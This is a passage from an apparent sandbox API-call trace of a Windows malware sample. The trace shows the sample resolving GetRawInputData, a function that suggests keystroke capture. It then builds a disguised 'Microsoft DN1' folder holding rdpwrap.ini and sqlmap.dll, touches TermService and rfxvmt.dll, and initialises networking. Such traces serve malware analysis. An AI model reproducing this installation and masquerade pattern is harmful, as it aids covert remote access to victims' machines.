lpString2="GetRawInputData") returned -1 [0297.953] lstrcmpA (lpString1="CreateMenu", lpString2="GetRawInputData") returned -1 [0297.953] lstrcmpA (lpString1="CreatePopupMenu", lpString2="GetRawInputData") returned -1 [0297.953] lstrcmpA (lpString1="CreateSystemThreads", lpString2="GetRawInputData") returned -1 [0297.953] lstrcmpA (lpString1="CreateWindowExA", lpString2="GetRawInputData") returned -1 [0297.953] lstrcmpA (lpString1="CreateWindowExW", lpString2="GetRawInputData") returned -1 [0297.953] lstrcmpA (lpString1="CreateWindowInBand", lpString2="GetRawInputData") returned -1 [0297.953] lstrcmpA (lpString1="CreateWindowInBandEx", lpString2="GetRawInputData") returned -1 [0297.953] lstrcmpA (lpString1="CreateWindowIndirect", lpString2="GetRawInputData") returned -1 [0297.953] lstrcmpA (lpString1="CreateWindowStationA", lpString2="GetRawInputData") returned -1 [0297.953] lstrcmpA (lpString1="CreateWindowStationW", lpString2="GetRawInputData") returned -1 [0297.953] lstrcmpA (lpString1="CsrBroadcastSystemMessageExW", lpString2="GetRawInputData") returned -1 [0297.953] lstrcmpA (lpString1="CtxInitUser32", lpString2="GetRawInputData") returned -1 [0297.954] lstrcmpA (lpString1="DdeAbandonTransaction", lpString2="GetRawInputData") returned -1 [0297.954] lstrcmpA (lpString1="DdeAccessData", lpString2="GetRawInputData") returned -1 [0297.954] lstrcmpA (lpString1="DdeAddData", lpString2="GetRawInputData") returned -1 [0297.954] lstrcmpA (lpString1="DdeClientTransaction", lpString2="GetRawInputData") returned -1 [0297.954] lstrcmpA (lpString1="DdeCmpStringHandles", lpString2="GetRawInputData") returned -1 [0297.954] lstrcmpA (lpString1="DdeConnect", lpString2="GetRawInputData") returned -1 [0297.954] lstrcmpA (lpString1="DdeConnectList", lpString2="GetRawInputData") returned -1 [0297.954] lstrcmpA (lpString1="DdeCreateDataHandle", lpString2="GetRawInputData") returned -1 [0297.954] lstrcmpA (lpString1="DdeCreateStringHandleA", lpString2="GetRawInputData") returned -1 [0297.954] lstrcmpA (lpString1="DdeCreateStringHandleW", lpString2="GetRawInputData") returned -1 [0297.954] lstrcmpA (lpString1="DdeDisconnect", lpString2="GetRawInputData") returned -1 [0297.954] lstrcmpA (lpString1="DdeDisconnectList", lpString2="GetRawInputData") returned -1 [0297.954] lstrcmpA (lpString1="DdeEnableCallback", lpString2="GetRawInputData") returned -1 [0297.954] lstrcmpA (lpString1="DdeFreeDataHandle", lpString2="GetRawInputData") returned -1 [0297.954] lstrcmpA (lpString1="DdeFreeStringHandle", lpString2="GetRawInputData") returned -1 [0297.954] lstrcmpA (lpString1="DdeGetData", lpString2="GetRawInputData") returned -1 [0297.954] lstrcmpA (lpString1="DdeGetLastError", lpString2="GetRawInputData") returned -1 [0297.954] lstrcmpA (lpString1="DdeGetQualityOfService", lpString2="GetRawInputData") returned -1 [0297.954] lstrcmpA (lpString1="DdeImpersonateClient", lpString2="GetRawInputData") returned -1 [0297.954] lstrcmpA (lpString1="DdeInitializeA", lpString2="GetRawInputData") returned -1 [0297.954] lstrcmpA (lpString1="DdeInitializeW", lpString2="GetRawInputData") returned -1 [0297.954] lstrcmpA (lpString1="DdeKeepStringHandle", lpString2="GetRawInputData") returned -1 [0297.954] lstrcmpA (lpString1="DdeNameService", lpString2="GetRawInputData") returned -1 [0297.954] lstrcmpA (lpString1="DdePostAdvise", lpString2="GetRawInputData") returned -1 [0297.954] lstrcmpA (lpString1="DdeQueryConvInfo", lpString2="GetRawInputData") returned -1 [0297.954] lstrcmpA (lpString1="DdeQueryNextServer", lpString2="GetRawInputData") returned -1 [0297.954] lstrcmpA (lpString1="DdeQueryStringA", lpString2="GetRawInputData") returned -1 [0297.955] lstrcmpA (lpString1="DdeQueryStringW", lpString2="GetRawInputData") returned -1 [0297.955] lstrcmpA (lpString1="DdeReconnect", lpString2="GetRawInputData") returned -1 [0297.955] lstrcmpA (lpString1="DdeSetQualityOfService", lpString2="GetRawInputData") returned -1 [0297.955] lstrcmpA (lpString1="DdeSetUserHandle", lpString2="GetRawInputData") returned -1 [0297.955] lstrcmpA (lpString1="DdeUnaccessData", lpString2="GetRawInputData") returned -1 [0297.955] lstrcmpA (lpString1="DdeUninitialize", lpString2="GetRawInputData") returned -1 [0297.955] lstrcmpA (lpString1="DefDlgProcA", lpString2="GetRawInputData") returned -1 [0297.955] lstrcmpA (lpString1="DefDlgProcW", lpString2="GetRawInputData") returned -1 [0297.955] lstrcmpA (lpString1="DefFrameProcA", lpString2="GetRawInputData") returned -1 [0297.955] lstrcmpA (lpString1="DefFrameProcW", lpString2="GetRawInputData") returned -1 [0297.955] lstrcmpA (lpString1="DefMDIChildProcA", lpString2="GetRawInputData") returned -1 [0297.955] lstrcmpA (lpString1="DefMDIChildProcW", lpString2="GetRawInputData") returned -1 [0297.955] lstrcmpA (lpString1="DefRawInputProc", lpString2="GetRawInputData") returned -1 [0297.955] lstrcmpA (lpString1="DefWindowProcA", lpString2="GetRawInputData") returned -1 [0297.955] lstrcmpA (lpString1="DefWindowProcW", lpString2="GetRawInputData") returned -1 [0297.955] lstrcmpA (lpString1="DeferWindowPos", lpString2="GetRawInputData") returned -1 [0297.955] lstrcmpA (lpString1="DeferWindowPosAndBand", lpString2="GetRawInputData") returned -1 [0297.955] lstrcmpA (lpString1="DeleteMenu", lpString2="GetRawInputData") returned -1 [0297.955] lstrcmpA (lpString1="DeregisterShellHookWindow", lpString2="GetRawInputData") returned -1 [0297.955] lstrcmpA (lpString1="DestroyAcceleratorTable", lpString2="GetRawInputData") returned -1 [0297.955] lstrcmpA (lpString1="DestroyCaret", lpString2="GetRawInputData") returned -1 [0297.955] lstrcmpA (lpString1="DestroyCursor", lpString2="GetRawInputData") returned -1 [0297.955] lstrcmpA (lpString1="DestroyDCompositionHwndTarget", lpString2="GetRawInputData") returned -1 [0297.955] lstrcmpA (lpString1="DestroyIcon", lpString2="GetRawInputData") returned -1 [0297.955] lstrcmpA (lpString1="DestroyMenu", lpString2="GetRawInputData") returned -1 [0297.956] lstrcmpA (lpString1="DestroyReasons", lpString2="GetRawInputData") returned -1 [0297.956] lstrcmpA (lpString1="DestroyWindow", lpString2="GetRawInputData") returned -1 [0297.956] lstrcmpA (lpString1="DialogBoxIndirectParamA", lpString2="GetRawInputData") returned -1 [0297.956] lstrcmpA (lpString1="DialogBoxIndirectParamAorW", lpString2="GetRawInputData") returned -1 [0297.956] lstrcmpA (lpString1="DialogBoxIndirectParamW", lpString2="GetRawInputData") returned -1 [0297.956] lstrcmpA (lpString1="DialogBoxParamA", lpString2="GetRawInputData") returned -1 [0297.956] lstrcmpA (lpString1="DialogBoxParamW", lpString2="GetRawInputData") returned -1 [0297.956] lstrcmpA (lpString1="DisableProcessWindowsGhosting", lpString2="GetRawInputData") returned -1 [0297.956] lstrcmpA (lpString1="DispatchMessageA", lpString2="GetRawInputData") returned -1 [0297.956] lstrcmpA (lpString1="DispatchMessageW", lpString2="GetRawInputData") returned -1 [0297.956] lstrcmpA (lpString1="DisplayConfigGetDeviceInfo", lpString2="GetRawInputData") returned -1 [0297.956] lstrcmpA (lpString1="DisplayConfigSetDeviceInfo", lpString2="GetRawInputData") returned -1 [0297.956] lstrcmpA (lpString1="DisplayExitWindowsWarnings", lpString2="GetRawInputData") returned -1 [0297.956] lstrcmpA (lpString1="DlgDirListA", lpString2="GetRawInputData") returned -1 [0297.956] lstrcmpA (lpString1="DlgDirListComboBoxA", lpString2="GetRawInputData") returned -1 [0297.956] lstrcmpA (lpString1="DlgDirListComboBoxW", lpString2="GetRawInputData") returned -1 [0297.956] lstrcmpA (lpString1="DlgDirListW", lpString2="GetRawInputData") returned -1 [0297.956] lstrcmpA (lpString1="DlgDirSelectComboBoxExA", lpString2="GetRawInputData") returned -1 [0297.956] lstrcmpA (lpString1="DlgDirSelectComboBoxExW", lpString2="GetRawInputData") returned -1 [0297.956] lstrcmpA (lpString1="DlgDirSelectExA", lpString2="GetRawInputData") returned -1 [0297.956] lstrcmpA (lpString1="DlgDirSelectExW", lpString2="GetRawInputData") returned -1 [0297.956] lstrcmpA (lpString1="DoSoundConnect", lpString2="GetRawInputData") returned -1 [0297.956] lstrcmpA (lpString1="DoSoundDisconnect", lpString2="GetRawInputData") returned -1 [0297.956] lstrcmpA (lpString1="DragDetect", lpString2="GetRawInputData") returned -1 [0297.956] lstrcmpA (lpString1="DragObject", lpString2="GetRawInputData") returned -1 [0297.956] lstrcmpA (lpString1="DrawAnimatedRects", lpString2="GetRawInputData") returned -1 [0297.956] lstrcmpA (lpString1="DrawCaption", lpString2="GetRawInputData") returned -1 [0297.957] lstrcmpA (lpString1="DrawCaptionTempA", lpString2="GetRawInputData") returned -1 [0297.957] lstrcmpA (lpString1="DrawCaptionTempW", lpString2="GetRawInputData") returned -1 [0297.957] lstrcmpA (lpString1="DrawEdge", lpString2="GetRawInputData") returned -1 [0297.957] lstrcmpA (lpString1="DrawFocusRect", lpString2="GetRawInputData") returned -1 [0297.957] lstrcmpA (lpString1="DrawFrame", lpString2="GetRawInputData") returned -1 [0297.957] lstrcmpA (lpString1="DrawFrameControl", lpString2="GetRawInputData") returned -1 [0297.957] lstrcmpA (lpString1="DrawIcon", lpString2="GetRawInputData") returned -1 [0297.957] lstrcmpA (lpString1="DrawIconEx", lpString2="GetRawInputData") returned -1 [0297.957] lstrcmpA (lpString1="DrawMenuBar", lpString2="GetRawInputData") returned -1 [0297.957] lstrcmpA (lpString1="DrawMenuBarTemp", lpString2="GetRawInputData") returned -1 [0297.957] lstrcmpA (lpString1="DrawStateA", lpString2="GetRawInputData") returned -1 [0297.957] lstrcmpA (lpString1="DrawStateW", lpString2="GetRawInputData") returned -1 [0297.957] lstrcmpA (lpString1="DrawTextA", lpString2="GetRawInputData") returned -1 [0297.957] lstrcmpA (lpString1="DrawTextExA", lpString2="GetRawInputData") returned -1 [0297.957] lstrcmpA (lpString1="DrawTextExW", lpString2="GetRawInputData") returned -1 [0297.957] lstrcmpA (lpString1="DrawTextW", lpString2="GetRawInputData") returned -1 [0297.957] lstrcmpA (lpString1="DwmGetDxSharedSurface", lpString2="GetRawInputData") returned -1 [0297.957] lstrcmpA (lpString1="DwmGetRemoteSessionOcclusionEvent", lpString2="GetRawInputData") returned -1 [0297.957] lstrcmpA (lpString1="DwmGetRemoteSessionOcclusionState", lpString2="GetRawInputData") returned -1 [0297.957] lstrcmpA (lpString1="DwmKernelShutdown", lpString2="GetRawInputData") returned -1 [0297.957] lstrcmpA (lpString1="DwmKernelStartup", lpString2="GetRawInputData") returned -1 [0297.957] lstrcmpA (lpString1="DwmLockScreenUpdates", lpString2="GetRawInputData") returned -1 [0297.957] lstrcmpA (lpString1="DwmValidateWindow", lpString2="GetRawInputData") returned -1 [0297.957] lstrcmpA (lpString1="EditWndProc", lpString2="GetRawInputData") returned -1 [0297.957] lstrcmpA (lpString1="EmptyClipboard", lpString2="GetRawInputData") returned -1 [0297.957] lstrcmpA (lpString1="EnableChildWindowDpiMessage", lpString2="GetRawInputData") returned -1 [0297.958] lstrcmpA (lpString1="EnableMenuItem", lpString2="GetRawInputData") returned -1 [0297.958] lstrcmpA (lpString1="EnableMouseInPointer", lpString2="GetRawInputData") returned -1 [0297.958] lstrcmpA (lpString1="EnableScrollBar", lpString2="GetRawInputData") returned -1 [0297.958] lstrcmpA (lpString1="EnableSessionForMMCSS", lpString2="GetRawInputData") returned -1 [0297.958] lstrcmpA (lpString1="EnableWindow", lpString2="GetRawInputData") returned -1 [0297.958] lstrcmpA (lpString1="EndDeferWindowPos", lpString2="GetRawInputData") returned -1 [0297.958] lstrcmpA (lpString1="EndDeferWindowPosEx", lpString2="GetRawInputData") returned -1 [0297.958] lstrcmpA (lpString1="EndDialog", lpString2="GetRawInputData") returned -1 [0297.958] lstrcmpA (lpString1="EndMenu", lpString2="GetRawInputData") returned -1 [0297.958] lstrcmpA (lpString1="EndPaint", lpString2="GetRawInputData") returned -1 [0297.958] lstrcmpA (lpString1="EndTask", lpString2="GetRawInputData") returned -1 [0297.958] lstrcmpA (lpString1="EnterReaderModeHelper", lpString2="GetRawInputData") returned -1 [0297.958] lstrcmpA (lpString1="EnumChildWindows", lpString2="GetRawInputData") returned -1 [0297.958] lstrcmpA (lpString1="EnumClipboardFormats", lpString2="GetRawInputData") returned -1 [0297.958] lstrcmpA (lpString1="EnumDesktopWindows", lpString2="GetRawInputData") returned -1 [0297.958] lstrcmpA (lpString1="EnumDesktopsA", lpString2="GetRawInputData") returned -1 [0297.958] lstrcmpA (lpString1="EnumDesktopsW", lpString2="GetRawInputData") returned -1 [0297.958] lstrcmpA (lpString1="EnumDisplayDevicesA", lpString2="GetRawInputData") returned -1 [0297.958] lstrcmpA (lpString1="EnumDisplayDevicesW", lpString2="GetRawInputData") returned -1 [0297.958] lstrcmpA (lpString1="EnumDisplayMonitors", lpString2="GetRawInputData") returned -1 [0297.958] lstrcmpA (lpString1="EnumDisplaySettingsA", lpString2="GetRawInputData") returned -1 [0297.958] lstrcmpA (lpString1="EnumDisplaySettingsExA", lpString2="GetRawInputData") returned -1 [0297.958] lstrcmpA (lpString1="EnumDisplaySettingsExW", lpString2="GetRawInputData") returned -1 [0297.959] GetProcessHeap () returned 0x650000 [0297.959] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x66ccd0 [0297.959] lstrlenW (lpString="TermService") returned 11 [0297.959] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x3190000 [0297.960] lstrlenW (lpString="TermService") returned 11 [0297.960] lstrcpyW (in: lpString1=0x3190000, lpString2="TermService" | out: lpString1="TermService") returned="TermService" [0297.960] lstrlenW (lpString="TermService") returned 11 [0297.960] VirtualAlloc (lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x4) returned 0x31a0000 [0297.960] lstrcatW (in: lpString1="", lpString2="TermService" | out: lpString1="TermService") returned="TermService" [0297.960] VirtualFree (lpAddress=0x3190000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0297.961] lstrlenW (lpString="%ProgramFiles%") returned 14 [0297.961] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x3190000 [0297.961] lstrlenW (lpString="%ProgramFiles%") returned 14 [0297.961] lstrcpyW (in: lpString1=0x3190000, lpString2="%ProgramFiles%" | out: lpString1="%ProgramFiles%") returned="%ProgramFiles%" [0297.961] lstrlenW (lpString="%ProgramFiles%") returned 14 [0297.961] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x31b0000 [0297.962] lstrcatW (in: lpString1="", lpString2="%ProgramFiles%" | out: lpString1="%ProgramFiles%") returned="%ProgramFiles%" [0297.962] VirtualFree (lpAddress=0x3190000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0297.962] lstrlenW (lpString="%windir%\\System32") returned 17 [0297.962] VirtualAlloc (lpAddress=0x0, dwSize=0x24, flAllocationType=0x3000, flProtect=0x4) returned 0x3190000 [0297.963] lstrlenW (lpString="%windir%\\System32") returned 17 [0297.963] lstrcpyW (in: lpString1=0x3190000, lpString2="%windir%\\System32" | out: lpString1="%windir%\\System32") returned="%windir%\\System32" [0297.963] ExpandEnvironmentStringsW (in: lpSrc="%windir%\\System32", lpDst=0x2c8fb00, nSize=0x1ff | out: lpDst="C:\\Windows\\System32") returned 0x14 [0297.963] lstrlenW (lpString="C:\\Windows\\System32") returned 19 [0297.963] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x31c0000 [0297.964] lstrlenW (lpString="C:\\Windows\\System32") returned 19 [0297.964] lstrcpyW (in: lpString1=0x31c0000, lpString2="C:\\Windows\\System32" | out: lpString1="C:\\Windows\\System32") returned="C:\\Windows\\System32" [0297.964] lstrlenW (lpString="C:\\Windows\\System32") returned 19 [0297.964] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x31d0000 [0297.964] lstrcpyW (in: lpString1=0x31d0000, lpString2="C:\\Windows\\System32" | out: lpString1="C:\\Windows\\System32") returned="C:\\Windows\\System32" [0297.964] VirtualFree (lpAddress=0x31c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0297.965] VirtualFree (lpAddress=0x3190000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0297.965] GetCurrentProcess () returned 0xffffffff [0297.966] GetModuleHandleA (lpModuleName="kernel32") returned 0x74c90000 [0297.966] GetProcAddress (hModule=0x74c90000, lpProcName="IsWow64Process") returned 0x74ca9f10 [0297.966] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2c8fef0 | out: Wow64Process=0x2c8fef0*=1) returned 1 [0297.966] VirtualFree (lpAddress=0x31b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0297.966] lstrlenW (lpString="%ProgramW6432%") returned 14 [0297.966] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x3190000 [0297.967] lstrlenW (lpString="%ProgramW6432%") returned 14 [0297.967] lstrcpyW (in: lpString1=0x3190000, lpString2="%ProgramW6432%" | out: lpString1="%ProgramW6432%") returned="%ProgramW6432%" [0297.967] lstrlenW (lpString="%ProgramW6432%") returned 14 [0297.967] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x31b0000 [0297.968] lstrcatW (in: lpString1="", lpString2="%ProgramW6432%" | out: lpString1="%ProgramW6432%") returned="%ProgramW6432%" [0297.968] VirtualFree (lpAddress=0x3190000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0297.969] ExpandEnvironmentStringsW (in: lpSrc="%ProgramW6432%", lpDst=0x2c8fb00, nSize=0x1ff | out: lpDst="C:\\Program Files") returned 0x11 [0297.969] lstrlenW (lpString="C:\\Program Files") returned 16 [0297.969] VirtualAlloc (lpAddress=0x0, dwSize=0x22, flAllocationType=0x3000, flProtect=0x4) returned 0x3190000 [0297.969] lstrlenW (lpString="C:\\Program Files") returned 16 [0297.969] lstrcpyW (in: lpString1=0x3190000, lpString2="C:\\Program Files" | out: lpString1="C:\\Program Files") returned="C:\\Program Files" [0297.969] lstrlenW (lpString="C:\\Program Files") returned 16 [0297.969] VirtualAlloc (lpAddress=0x0, dwSize=0x22, flAllocationType=0x3000, flProtect=0x4) returned 0x31c0000 [0297.970] lstrcpyW (in: lpString1=0x31c0000, lpString2="C:\\Program Files" | out: lpString1="C:\\Program Files") returned="C:\\Program Files" [0297.970] VirtualFree (lpAddress=0x3190000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0297.970] VirtualFree (lpAddress=0x31b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0297.971] lstrlenW (lpString="%ProgramFiles%") returned 14 [0297.971] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x3190000 [0297.971] lstrlenW (lpString="%ProgramFiles%") returned 14 [0297.971] lstrcpyW (in: lpString1=0x3190000, lpString2="%ProgramFiles%" | out: lpString1="%ProgramFiles%") returned="%ProgramFiles%" [0297.971] lstrlenW (lpString="%ProgramFiles%") returned 14 [0297.971] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x31b0000 [0297.972] lstrcatW (in: lpString1="", lpString2="%ProgramFiles%" | out: lpString1="%ProgramFiles%") returned="%ProgramFiles%" [0297.972] VirtualFree (lpAddress=0x3190000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0297.972] lstrlenW (lpString="\\Microsoft DN1") returned 14 [0297.972] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x3190000 [0297.973] lstrlenW (lpString="\\Microsoft DN1") returned 14 [0297.973] lstrcpyW (in: lpString1=0x3190000, lpString2="\\Microsoft DN1" | out: lpString1="\\Microsoft DN1") returned="\\Microsoft DN1" [0297.973] lstrlenW (lpString="\\Microsoft DN1") returned 14 [0297.973] lstrlenW (lpString="C:\\Program Files") returned 16 [0297.973] VirtualQuery (in: lpAddress=0x31c0000, lpBuffer=0x2c8fea4, dwLength=0x1c | out: lpBuffer=0x2c8fea4*(BaseAddress=0x31c0000, AllocationBase=0x31c0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0297.973] VirtualAlloc (lpAddress=0x0, dwSize=0x40, flAllocationType=0x3000, flProtect=0x4) returned 0x31e0000 [0297.973] VirtualFree (lpAddress=0x31c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0297.974] lstrcatW (in: lpString1="C:\\Program Files", lpString2="\\Microsoft DN1" | out: lpString1="C:\\Program Files\\Microsoft DN1") returned="C:\\Program Files\\Microsoft DN1" [0297.974] VirtualFree (lpAddress=0x3190000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0297.975] lstrlenW (lpString="\\Microsoft DN1") returned 14 [0297.975] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x3190000 [0297.975] lstrlenW (lpString="\\Microsoft DN1") returned 14 [0297.975] lstrcpyW (in: lpString1=0x3190000, lpString2="\\Microsoft DN1" | out: lpString1="\\Microsoft DN1") returned="\\Microsoft DN1" [0297.975] lstrlenW (lpString="\\Microsoft DN1") returned 14 [0297.975] lstrlenW (lpString="%ProgramFiles%") returned 14 [0297.975] VirtualQuery (in: lpAddress=0x31b0000, lpBuffer=0x2c8fea4, dwLength=0x1c | out: lpBuffer=0x2c8fea4*(BaseAddress=0x31b0000, AllocationBase=0x31b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0297.975] VirtualAlloc (lpAddress=0x0, dwSize=0x3c, flAllocationType=0x3000, flProtect=0x4) returned 0x31c0000 [0297.976] VirtualFree (lpAddress=0x31b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0297.976] lstrcatW (in: lpString1="%ProgramFiles%", lpString2="\\Microsoft DN1" | out: lpString1="%ProgramFiles%\\Microsoft DN1") returned="%ProgramFiles%\\Microsoft DN1" [0297.976] VirtualFree (lpAddress=0x3190000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0297.977] lstrlenW (lpString="\\rfxvmt.dll") returned 11 [0297.977] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x3190000 [0297.977] lstrlenW (lpString="\\rfxvmt.dll") returned 11 [0297.977] lstrcpyW (in: lpString1=0x3190000, lpString2="\\rfxvmt.dll" | out: lpString1="\\rfxvmt.dll") returned="\\rfxvmt.dll" [0297.978] lstrlenW (lpString="\\rfxvmt.dll") returned 11 [0297.978] lstrlenW (lpString="C:\\Windows\\System32") returned 19 [0297.978] VirtualQuery (in: lpAddress=0x31d0000, lpBuffer=0x2c8fea4, dwLength=0x1c | out: lpBuffer=0x2c8fea4*(BaseAddress=0x31d0000, AllocationBase=0x31d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0297.978] VirtualAlloc (lpAddress=0x0, dwSize=0x40, flAllocationType=0x3000, flProtect=0x4) returned 0x31b0000 [0297.978] VirtualFree (lpAddress=0x31d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0297.979] lstrcatW (in: lpString1="C:\\Windows\\System32", lpString2="\\rfxvmt.dll" | out: lpString1="C:\\Windows\\System32\\rfxvmt.dll") returned="C:\\Windows\\System32\\rfxvmt.dll" [0297.979] VirtualFree (lpAddress=0x3190000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0297.980] SHCreateDirectoryExW (hwnd=0x0, pszPath="C:\\Program Files\\Microsoft DN1" (normalized: "c:\\program files\\microsoft dn1"), psa=0x0) returned 183 [0297.981] lstrlenW (lpString="C:\\Program Files\\Microsoft DN1") returned 30 [0297.981] VirtualAlloc (lpAddress=0x0, dwSize=0x3e, flAllocationType=0x3000, flProtect=0x4) returned 0x3190000 [0297.981] lstrcpyW (in: lpString1=0x3190000, lpString2="C:\\Program Files\\Microsoft DN1" | out: lpString1="C:\\Program Files\\Microsoft DN1") returned="C:\\Program Files\\Microsoft DN1" [0297.981] lstrlenW (lpString="\\rdpwrap.ini") returned 12 [0297.981] VirtualAlloc (lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x4) returned 0x31d0000 [0297.982] lstrlenW (lpString="\\rdpwrap.ini") returned 12 [0297.982] lstrcpyW (in: lpString1=0x31d0000, lpString2="\\rdpwrap.ini" | out: lpString1="\\rdpwrap.ini") returned="\\rdpwrap.ini" [0297.982] lstrlenW (lpString="\\rdpwrap.ini") returned 12 [0297.982] lstrlenW (lpString="C:\\Program Files\\Microsoft DN1") returned 30 [0297.982] VirtualQuery (in: lpAddress=0x3190000, lpBuffer=0x2c8fea4, dwLength=0x1c | out: lpBuffer=0x2c8fea4*(BaseAddress=0x3190000, AllocationBase=0x3190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0297.982] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x31f0000 [0297.982] VirtualFree (lpAddress=0x3190000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0298.005] lstrcatW (in: lpString1="C:\\Program Files\\Microsoft DN1", lpString2="\\rdpwrap.ini" | out: lpString1="C:\\Program Files\\Microsoft DN1\\rdpwrap.ini") returned="C:\\Program Files\\Microsoft DN1\\rdpwrap.ini" [0298.005] VirtualFree (lpAddress=0x31d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0298.010] lstrlenW (lpString="\\sqlmap.dll") returned 11 [0298.010] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x3190000 [0298.030] lstrlenW (lpString="\\sqlmap.dll") returned 11 [0298.030] lstrcpyW (in: lpString1=0x3190000, lpString2="\\sqlmap.dll" | out: lpString1="\\sqlmap.dll") returned="\\sqlmap.dll" [0298.030] lstrlenW (lpString="\\sqlmap.dll") returned 11 [0298.030] lstrlenW (lpString="C:\\Program Files\\Microsoft DN1") returned 30 [0298.030] VirtualQuery (in: lpAddress=0x31e0000, lpBuffer=0x2c8fea4, dwLength=0x1c | out: lpBuffer=0x2c8fea4*(BaseAddress=0x31e0000, AllocationBase=0x31e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0298.030] VirtualAlloc (lpAddress=0x0, dwSize=0x56, flAllocationType=0x3000, flProtect=0x4) returned 0x31d0000 [0298.031] VirtualFree (lpAddress=0x31e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0298.031] lstrcatW (in: lpString1="C:\\Program Files\\Microsoft DN1", lpString2="\\sqlmap.dll" | out: lpString1="C:\\Program Files\\Microsoft DN1\\sqlmap.dll") returned="C:\\Program Files\\Microsoft DN1\\sqlmap.dll" [0298.031] VirtualFree (lpAddress=0x3190000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0298.032] lstrlenW (lpString="\\sqlmap.dll") returned 11 [0298.032] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x3190000 [0298.032] lstrlenW (lpString="\\sqlmap.dll") returned 11 [0298.032] lstrcpyW (in: lpString1=0x3190000, lpString2="\\sqlmap.dll" | out: lpString1="\\sqlmap.dll") returned="\\sqlmap.dll" [0298.032] lstrlenW (lpString="\\sqlmap.dll") returned 11 [0298.032] lstrlenW (lpString="%ProgramFiles%\\Microsoft DN1") returned 28 [0298.032] VirtualQuery (in: lpAddress=0x31c0000, lpBuffer=0x2c8fea4, dwLength=0x1c | out: lpBuffer=0x2c8fea4*(BaseAddress=0x31c0000, AllocationBase=0x31c0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0298.032] VirtualAlloc (lpAddress=0x0, dwSize=0x52, flAllocationType=0x3000, flProtect=0x4) returned 0x31e0000 [0298.033] VirtualFree (lpAddress=0x31c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0298.033] lstrcatW (in: lpString1="%ProgramFiles%\\Microsoft DN1", lpString2="\\sqlmap.dll" | out: lpString1="%ProgramFiles%\\Microsoft DN1\\sqlmap.dll") returned="%ProgramFiles%\\Microsoft DN1\\sqlmap.dll" [0298.033] VirtualFree (lpAddress=0x3190000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0298.034] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x3190000 [0298.035] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x270 [0298.035] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x2b3dba4 | out: lpWSAData=0x2b3dba4) returned 0 [0298.041] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x31c0000 [0298.041] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x288 [0298.041] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x2b3dd84 | out: lpWSAData=0x2b3dd84) returned 0 [0298.041] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x28c [0298.042] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0298.042] GetTickCount () returned 0x1e7ab [0298.042] GetModuleFileNameA (in: 